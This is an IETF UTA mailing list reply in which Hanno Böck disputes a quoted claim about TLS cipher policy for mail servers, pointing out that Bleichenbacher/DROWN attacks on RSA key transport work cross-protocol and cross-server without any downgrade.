On Fri, 27 Oct 2017 05:20:40 -0400 Viktor Dukhovni <ietf-d...@dukhovni.org> wrote:
> Mostly we shoul major layer violations here. Servers will > support the vast majority of non-deprecated ciphers and need > to support at least the MTI ciphers. Clients will likely balk > at doing RC4 or 3DES, and insist on AES128. They'll likely > prefer ciphers with DHE or ECDHE and GCM (for better or worse) > over other types of ciphers, but STS should be over prescriptive > here. As my name appears on the DROWN paper, I would be remiss > of me to not concede that RSA key transport should be avoided, > but the way to do that is promote the use of stronger options > more than by proscribing the weaker ones. The basic TLS protocol > does a fair job of avoiding downgrade attacks, especially because > MTAs (unlike browsers) don't generally do the protocol fallback > dance. That's not how Bleichenbacher attacks work... (which you should know as a co-author of the drown paper.) As it has been pointed out multiple times this attack works cross-protocol and cross-server, so the mere existence of a vulnerable TLS RSA implementaiton with the same cert is a risk. You don't need any downgrade attack for that. -- Hanno Böck https://hboeck.de/ mail/jabber: ha...@hboeck.de GPG: FE73757FA60E4E21B937579FA5880072BBB51E42 _______________________________________________ Uta mailing list Uta@ietf.org https://www.ietf.org/mailman/listinfo/uta
